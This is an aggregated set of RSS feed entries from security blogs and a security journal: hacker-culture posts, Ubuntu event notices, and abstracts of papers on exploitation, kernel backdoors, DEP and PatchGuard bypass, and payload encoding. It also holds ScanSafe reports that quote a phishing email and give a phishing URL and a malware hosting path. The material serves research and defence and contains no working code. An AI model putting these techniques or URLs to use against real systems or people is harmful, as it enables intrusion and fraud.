http://www.spacerogue.net/wordpress/?feed=rss2 Book Review: This Machine Kills Secrets By: Andy Greenberg Penguin Group 2012 ISBN 978-1-101-59358-5 *Page references have been taken from the electronic iPad version I'll admit I haven't finished the whole book yet but the way the book portrays some events I was involved in differs from my own memory. I wanted to highlight those [...]

==> Hackers and Media Hype or Big Hacks That Never Really Happened

http://www.spacerogue.net/wordpress/?feed=rss2 I have been giving my talk “Hackers and Media Hype or Big Hacks That Never Really Happened” for a few months now and I think it is time to retire it. You may have seen it at Shmoocon Epilogue, Source Boston or Hope 9. If not catch the video below. I also have the entire [...]

==> Emails From Michael In Iran

http://www.spacerogue.net/wordpress/?feed=rss2 If publishing unsourced emails claiming to be from Iran is a newsworthy event then I guess we should all copy Mikko and do the same thing. A few years ago I received a chain of emails from ‘Michael’ that started out as the normal ‘teach me to hack’ emails I receive on an almost daily [...]

==> L0pht Hacker Space Visa

http://www.spacerogue.net/wordpress/?feed=rss2 The L0pht was not the first hacker space, in fact at the time of its creation in Boston there were at least two other such spaces, Sinister House and Messiah Village, which later moved and became New Hack City, or simply New Hack. L0pht wasn't even the cause of the recent explosion of hacker spaces [...]

==> FUD can Sometimes be Useful

http://www.spacerogue.net/wordpress/?feed=rss2 There has been a story making the rounds the last few weeks that is really bugging me. I was going to let it slide but the story just won't die and every time it comes around again I just get angrier. The problem is I don't think the story is actually true, which wouldn't be [...]

==> Handle Shmandle

http://www.spacerogue.net/wordpress/?feed=rss2 A lot of people ask me why I still use a handle and go by ‘Space Rogue’ instead of using my real name. Trust me it is kinda awkward to go to a respectable con like BSides, Blackhat or even RSA and introduce myself as ‘Space Rogue’. People always ask me to repeat myself as [...]

==> bleep the SCADA is Falling!!!

http://www.spacerogue.net/wordpress/?feed=rss2 Let me say first that SCADA (supervisory control and data acquisition) attacks are real, they do happen and should be a real concern. But if we look at the recent press surrounding such attacks we see little in the way of any hard evidence that such an attack actually occurred. Instead we see rumor and [...]

==> NASA Confirms but China Denies Satellite ‘hacking’

http://www.spacerogue.net/wordpress/?feed=rss2 Since I posted my previous item regarding my suspicions as to the validity of the claims of ‘interference’ with a US Government satellite there have been a few more developments. First NASA has come out and ‘confirmed’ the interference. According to NASA PAO: “NASA experienced two suspicious events with the Terra spacecraft in the summer and [...]

==> Rebuttal – “Hackers reportedly behind U.S. government satellite disruptions”

http://www.spacerogue.net/wordpress/?feed=rss2 First some historical background, this is at least the third time I have seen a similar story over the last 15 years. “bleep ‘hackers’ can control a satellite”, the previous two times it turned out to be false. The first time I was one of the first people to call the story suspect. It is hard [...]

==> We would like your feedback

http://www.spacerogue.net/wordpress/?feed=rss2 Getting your customers to fill out market satisfaction surveys is all the rage these days. “We greatly appreciate your feedback” Hey, it's free demographic marketing! It's also usually ego stroking, studies show that people tend to skew their own responses to the positive side of things. Generally I don't fill these things out at [...]

==> The Open Cloud Webinars: Stability, support and the latest cloud features: using the Ubuntu Cloud Archive

http://www.ubuntu.com/rss.xml The pace of innovation in the cloud is ferocious. And there's no better example than OpenStack - the fastest growing open source project ever, according to some reports. Join Ubuntu Server Engineering Manager Dave Walker, to learn how the Ubuntu Cloud Archive provides access to the very latest OpenStack features on long-term support releases of Ubuntu. The webinar will cover the principles behind the Ubuntu Cloud Archive and its use in the enterprise, enabling you and your organisation to make the most of the open cloud. Location: Online Time: Wed, 2012-11-07 16:00

==> The Open Cloud Webinars: Running OpenStack Folsom on Ubuntu 12.10 and Ubuntu 12.04 LTS

http://www.ubuntu.com/rss.xml The second webinar of our Ubuntu 12.10 series focuses on Folsom, the latest release of OpenStack. In this webinar, Ubuntu Server Engineering Manager Dave Walker will talk you through the process of deploying Folsom on Ubuntu 12.10 and 12.04 LTS, showcasing some of the unique deployment tools that make Ubuntu the fastest route to a fully-operative, enterprise-grade OpenStack cloud. Join us, learn more and ask questions live! Location: Online Time: Wed, 2012-10-31 17:00

==> The Open Cloud Webinars: New features in Ubuntu 12.10, the world’s most cloud-friendly OS

http://www.ubuntu.com/rss.xml Another six months have passed, so it's time for the next Ubuntu release! Join Mark Baker, Ubuntu Server Product Manager, to find out about the new features in Ubuntu 12.10 and how you can take advantage of them. Whether you are new to Ubuntu or using it already, this webinar will give you an insight into 12.10 for both server and cloud computing. Register today and ask questions live! Location: Online Time: Tue, 2012-10-23 16:00

==> Ubuntu Enterprise Summit

http://www.ubuntu.com/rss.xml The Ubuntu Enterprise Summit is a one-day conference aimed at technologists and IT decision-makers. At this year's event, analysts and technologists will join key figures from Canonical to discuss the new best practice and the road ahead for enterprise IT. For more information and to view the agenda, visit: http://uds.ubuntu.com/enterprise-summit/ Location: Copenhagen, Denmark Time: Tue, 2012-10-30 (All day)

==> Ubuntu Developer Summit

http://www.ubuntu.com/rss.xml Come and join us for yet another fantastic, action-packed Ubuntu Developer Summit! This time, we're in Europe at the Bella Centre in Copenhagen. Registration is free and spaces are limited, so hurry! The Ubuntu Developer Summit is the event where we plan for the forthcoming version of Ubuntu. It brings together Canonical engineers, community members, partners, upstream representatives and cloud specialists, in an environment of active debate. For more information, visit: http://uds.ubuntu.com Location: Copenhagen, Denmark Time: Mon, 2012-10-29 (All day) - Thu, 2012-11-01 (All day)

==> DroidCon

http://www.ubuntu.com/rss.xml Canonical is a Partner Sponsor at the upcoming DroidCon event. Location: London, UK Time: Thu, 2012-10-25 (All day) - Fri, 2012-10-26 (All day)

==> Mass TLC: Cloud Summit

http://www.ubuntu.com/rss.xml Canonical will have a presence at Mass TLC's upcoming Cloud Summit. If you're in the area, stop by and say hello! Location: Boston, USA Time: Fri, 2012-10-19 (All day)

==> The OpenStack Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be one of the premier sponsors of the OpenStack Summit. Ubuntu Founder, Mark Shuttleworth, will be presenting a keynote session and the Canonical team will be there, so stop by our booth and say hello! Canonical was the first company to commercially distribute and support OpenStack - and Ubuntu has remained the reference operating system for the OpenStack project since the beginning. We include it in every download and CD of Ubuntu Server, which gives us a huge interest in its continuing development. Canonical is also one of eight members of the OpenStack Foundation. Location: San Diego, USA Time: Mon, 2012-10-15 (All day) - Thu, 2012-10-18 (All day)

==> Zentyal Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be a Premier Sponsor for the upcoming Zentyal Summit. Zentyal is an official Ubuntu Advantage Reseller. For more information, visit: http://events.zentyal.com/2012/10/04/zentyal-summit-2012-2/ Location: Zaragosa, Spain Time: Thu, 2012-10-04 (All day)

==> New Landscape Features and Functionality

http://www.ubuntu.com/rss.xml Landscape is the Ubuntu systems management tool, proven to save time and money when managing Ubuntu deployments at scale. Join this webinar to learn about new features including role-based access control, bare-metal provisioning and its full API, alongside reporting capabilities and other tools to give you total operational awareness. You'll gain a comprehensive insight into how Landscape's enterprise systems management and regulatory compliance functionality can help an organisation tame complexity. Location: Webinar Time: Thu, 2012-09-20 16:00

==> Using dual-mappings to evade automated unpackers

http://www.uninformed.org/uninformed.rss Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.

==> Analyzing local privilege escalations in win32k

http://www.uninformed.org/uninformed.rss This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.

==> Exploiting Tomorrow's Internet Today: Penetration testing with IPv6

http://www.uninformed.org/uninformed.rss This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.

==> Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS

http://www.uninformed.org/uninformed.rss In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.

==> An Objective Analysis of the Lockdown Protection System for Battle.net

http://www.uninformed.org/uninformed.rss Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, it introduced several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.

==> ActiveX - Active Exploitation

http://www.uninformed.org/uninformed.rss This paper provides a general introduction to the topic of understanding software vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.

==> Context-keyed Payload Encoding

http://www.uninformed.org/uninformed.rss A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.

==> Improving Software Security Analysis using Exploitation Properties

http://www.uninformed.org/uninformed.rss Reliable exploitation of security vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.

==> Real-time Steganography with RTP

http://www.uninformed.org/uninformed.rss Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.

==> OS X Kernel-mode Exploitation in a Weekend

http://www.uninformed.org/uninformed.rss Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper will attempt to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finishes with remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used.

==> A Catalog of Local Windows Kernel-mode Backdoor Techniques

http://www.uninformed.org/uninformed.rss This paper presents a detailed catalog of techniques that can be used to create local kernel-mode backdoors on Windows. These techniques include function trampolines, descriptor table hooks, model-specific register hooks, page table modifications, as well as others that have not previously been described. The majority of these techniques have been publicly known far in advance of this paper. However, at the time of this writing, there appears to be no detailed single point of reference for many of them. The intention of this paper is to provide a solid understanding on the subject of local kernel-mode backdoors. This understanding is necessary in order to encourage the thoughtful discussion of potential countermeasures and perceived advancements. In the vein of countermeasures, some additional thoughts are given to the common misconception that PatchGuard, in its current design, can be used to prevent kernel-mode rootkits.

==> Generalizing Data Flow Information

http://www.uninformed.org/uninformed.rss Generalizing information is a common method of reducing the quantity of data that must be considered during analysis. This fact has been plainly illustrated in relation to static data flow analysis where previous research has described algorithms that can be used to generalize data flow information. These generalizations have helped support more optimal data flow analysis in certain situations. In the same vein, this paper describes a process that can be employed to generalize and persist data flow information along multiple generalization tiers. Each generalization tier is meant to describe the data flow behaviors of a conceptual software element such as an instruction, a basic block, a procedure, a data type, and so on. This process makes use of algorithms described in previous literature to support the generalization of data flow information. To illustrate the usefulness of the generalization process, this paper also presents an algorithm that can be used to determine reachability at each generalization tier. The algorithm determines reachability starting from the least specific generalization tier and uses the set of reachable paths found to progressively qualify data flow information for each successive generalization tier. This helps to constrain the amount of data flow information that must be considered to a minimal subset.

==> Reducing the Effective Entropy of GS Cookies

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.

==> Memalyze: Dynamic Analysis of Memory Access Behavior in Software

http://www.uninformed.org/uninformed.rss This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.

==> Mnemonic Password Formulas

http://www.uninformed.org/uninformed.rss The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recall termed Mnemonic Password Formulas.

==> Locreate: An Anagram for Relocate

http://www.uninformed.org/uninformed.rss This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation.

==> Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/uninformed.rss This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation.

==> Implementing a Custom X86 Encoder

http://www.uninformed.org/uninformed.rss This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder.

==> Preventing the Exploitation of SEH Overwrites

http://www.uninformed.org/uninformed.rss This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation.

==> Effective Bug Discovery

http://www.uninformed.org/uninformed.rss Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations.

==> Wars Within

http://www.uninformed.org/uninformed.rss In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play.

==> Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field

http://www.uninformed.org/uninformed.rss The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using.

==> Improving Automated Analysis of Windows x64 Binaries

http://www.uninformed.org/uninformed.rss As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can ...

==> Exploiting the Otherwise Non-Exploitable on Windows

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such ...

==> Abusing Mach on Mac OS X

http://www.uninformed.org/uninformed.rss This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, ...

==> GREPEXEC: Grepping Executive Objects from Pool Memory

http://www.uninformed.org/uninformed.rss As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to ...

==> Anti-Virus Software Gone Wrong

http://www.uninformed.org/uninformed.rss Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default ...

==> Bypassing PatchGuard on Windows x64

http://www.uninformed.org/uninformed.rss The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors ...

==> Windows Kernel-mode Payload Fundamentals

http://www.uninformed.org/uninformed.rss This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ...

==> Analyzing Common Binary Parser Mistakes

http://www.uninformed.org/uninformed.rss With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it ...

==> Attacking NTLM with Precomputed Hashtables

http://www.uninformed.org/uninformed.rss Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with ...

==> Linux Improvised Userland Schedular Virus

http://www.uninformed.org/uninformed.rss This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to ...

==> FUTo

http://www.uninformed.org/uninformed.rss Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms ...

==> Thick Clients Gone Wrong

http://www.uninformed.org/uninformed.rss When designing thick-client based solutions, developers often suffer from the incorrect assumption that end-users are incapable of modifying, examining, or emulating the packaged client. Throughout this document, ...

==> Inside Blizzard: Battle.net

http://www.uninformed.org/uninformed.rss This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat ...

==> Temporal Return Addresses

http://www.uninformed.org/uninformed.rss Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit ...

==> Bypassing Windows Hardware-enforced DEP

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute ...

==> 802.11 VLANs and Association Redirection

http://www.uninformed.org/uninformed.rss The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. ...

==> Introduction to Reverse Engineering Win32 Applications

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of ...

==> Post-Exploitation on Windows using ActiveX Controls

http://www.uninformed.org/uninformed.rss When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound ...

==> Smart Parking Meters

http://www.uninformed.org/uninformed.rss Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper ...

==> Loop Detection

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and ...

==> Social Zombies: Aspects of Trojan Networks

http://www.uninformed.org/uninformed.rss Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft ...

==> Mac OS X PPC Shellcode Tricks

http://www.uninformed.org/uninformed.rss Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction ...

==> Annoyances Caused by Unsafe Assumptions

http://www.uninformed.org/uninformed.rss This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases ...

==> Chasing Shadows in the IT Supply Chain

http://www.veracode.com/blog/?feed=rss2 Has our security been compromised before the shrink wrap is even off the box? The U.S. House of Representatives went on record this month with a warning to U.S. industry of the danger of compromised supply chains. But getting to the bottom of the supply chain threat will require more than just tough talk.

==> Patching Up the Patch Process

http://www.veracode.com/blog/?feed=rss2 Travis Emmert of Veracode is credited in the latest Oracle Critical Patch Update for reporting nine Web application vulnerabilities in Oracle Fusion Middleware, Imaging and Process Management. After talking to Travis about how he found the vulnerabilities, what he found, and Oracle's advisory release process, I thought this material would make for a good blog post. I asked Travis to take a few moments to write about this experience.

==> Obama vs Romney on Cybersecurity: You Decide Infographic

http://www.veracode.com/blog/?feed=rss2

==> Never Attribute to Malice, but Always Verify

http://www.veracode.com/blog/?feed=rss2 When I read the New York Times Bits article The Dangers of Allowing an Adversary Access to a Network by John Markoff, I thought the fear of trojaned vendor products is misplaced. The much bigger problem is vulnerable products. To cyber security experts, a serious vulnerability is indistinguishable from a backdoor as both allow an adversary to take control of a system or device. Yet the U.S. House Committee seems preoccupied with backdoors in Huawei technology while ignoring the gaping vulnerabilities.

==> Common Malware Types: Cybersecurity 101

http://www.veracode.com/blog/?feed=rss2 The amount and variety of malicious programs out there is enough to make your head spin. This blog post will break down the common types of malicious programs and provide a brief description of each. What is Malware? Malware is short for malicious software, meaning software that can be used to compromise computer functions, steal data, bypass access controls, or otherwise cause...

==> Bad Piggies, Graffiti and the IRT

http://www.veracode.com/blog/?feed=rss2 How bad is Google's application security problem? Think New York City in the 1970s. Just like New York during those dark days, Google faces a myriad of problems, many of its own making. And the Silicon Valley star might consider looking to Gotham for inspiration as it tries to turn things around.

==> Why You Should Care About Mobile Security Infographic

http://www.veracode.com/blog/?feed=rss2

==> How Secure is Your Software Security From Hackers?

http://www.veracode.com/blog/?feed=rss2 Companies spend millions on sophisticated anti-intrusion systems that lock down their corporate assets against any kind of network attack. Then they sit back and relax, confident that not even the smartest, trickiest, most downright determined hacker would ever be able to break in. And that hacker would have to be a total genius, right?

==> Bulking Up For BYOD: Veracode Acquires Marvin Mobile Security

http://www.veracode.com/blog/?feed=rss2 It's an exciting day here at Veracode as we've just announced our first ever company acquisition. We're pleased to announce that we have acquired the assets of Marvin Mobile Security, the developer of an innovative mobile app analysis service for enterprises, app stores and mobile carriers. Read more about this in our official press release.

==> Enterprise App Stores: Walled Gardens, or a Security Mirage?

http://www.veracode.com/blog/?feed=rss2 Enterprise app stores are all the rage, but do they solve the BYOD security conundrum? The short answer: no. The trend that Forrester Research famously dubbed the consumerization of IT is, just a short time later, accepted practice in the modern workplace. We see it every day, as workers migrate off of older generation cell phones to powerful smart phones like the iPhone and Android devices and companies abandon the enterprise friendly Blackberry platform en masse.

==> Spate of SpyEye Trojan Email

http://blog.scansafe.com/journal/rss.xml Beginning on May 5th, ScanSafe has observed numerous instances of a variant of the SpyEye family of trojans being delivered via email. The overwhelming majority of these are delivered via corporate mail; very few have been observed via free webmail services. The rate of encounter suggests the mail may be getting through corporate spam filtering at the affected locations. The body of the email contains a link that downloads a zip file containing the malware. The malware appears to be hosted on compromised websites in the following folder location: compromiseddomain\order\Order.zip The zip itself extracts into an executable. However, a double extension ruse combined with multiple spaces makes it appear as if the file is actually a .doc file (the spaces push the .exe extension off the screen). Obviously this could trick many users into attempting to open the "doc", in which case they will actually infect their PC with the SpyEye trojan. ScanSafe detects and blocks this malware as: Mal/BredoZp-B, Mal/EncPk-YJ, Trojan.Win32.Menti.gjgn, Trojan-Spy.Win32.SpyEyes.hdy. First observed encounter was 05-may-11 at 11:38:05 GMT.

==> Lizamoon SQL Injection: 7 Months Old and Counting

http://blog.scansafe.com/journal/rss.xml The Lizamoon SQL injection attack is not new; it's actually part of a continuous SQLi attack that spans the past seven months. Lizamoon.com is just one of the more recent of the 40+ malware domains that have been used in the ongoing injection attacks. Here are some quick facts regarding the SQLi / Lizamoon compromises:
* A total of 42 malware domains have been observed during the 7 months this attack has been ongoing;
* The first encounter Cisco ScanSafe recorded was 20-sep-10 21:58:08 GMT;
* Only 0.15% (zero point one five percent) have involved encounters with functional / active malware domains;
* 99.85% of encounters have involved malware domains that were non-resolvable (shutdown / offline) at the time of encounter;
* 55% of the encounters occurred on March 25th when the Lizamoon domain was added;
* The high rate of encounters on the 25th was solely due to a single high profile website that was compromised;
* Of the Lizamoon encounters on March 25th, only 0.13% were encounters with the live domain. 99.87% were non-resolvable (i.e. the domain was offline / not delivering content).
Here's the current list of domains we've observed in these attacks, from September 2010 through March 31, 2011:

==> Royal Engagement May Lead to Royal Malware Pains

http://blog.scansafe.com/journal/rss.xml The Telegraph reports "Royal memorabilia industry prepares to cash in" - The battle to cash in on Prince William's impending marriage to Kate Middleton has already begun, with an array of royal memorabilia set to flood the market. My first thought on reading this was that malware and scammers will be even quicker to cash in. Indeed, many are proclaiming that Prince William's and Kate Middleton's wedding (set for sometime next spring) will be the biggest marital event since Princess Di and Prince Charles. With that in mind, it's important to remember three important things: 1. Major breaking news events are favorite themes for malware purveyors and scammers; 2. Clicking unsolicited links in email and IM is a frequent path of infection; 3. Criminals work fast - expect your favorite search engine to already be sprinkled liberally with malicious results regarding the engagement and upcoming nuptials. Cisco ScanSafe research indicates that 3 out of every 100 malware encounters result from people clicking unsolicited malicious links in email, IM and social messaging, and 10 out of every 100 encounters occur via search engine results. Bottom line - think before you click, consider the source, and pay attention to the destination URL. By following this advice, hopefully you can toast to the happy couple without toasting your computer.

==> Phish with a Side of Barbecue

http://blog.scansafe.com/journal/rss.xml Looks like the latest Bank of America phishing scam is springboarding off a couple of compromised websites. First, here's a look at the predictably worded phishing email: Dear Bank of America Customer, We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you. To restore your account, please Sign in to Online Banking. Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now gramsbbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at: http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm This use of compromised sites as redirectors and phishing hosts enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.

==> WSJ a Victim, Not the Source, of SQL Injection

http://blog.scansafe.com/journal/rss.xml As mentioned earlier this week, about 7k pages (not sites) have been struck by SQL injected iframes pointing to malware on robint.us. (That number has been over-inflated to over 100k or even a million due to poorly constructed search queries, which was the subject of the previous post on the topic.) Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe investigation reveals the SQL injection attack that appeared on certain pages of the WSJ site wasn't the result of a compromise of WSJ directly, but rather the result of a compromise of a third-party partner. That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website. Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.

==> Robint.us a Poster Child for Repeat Injections

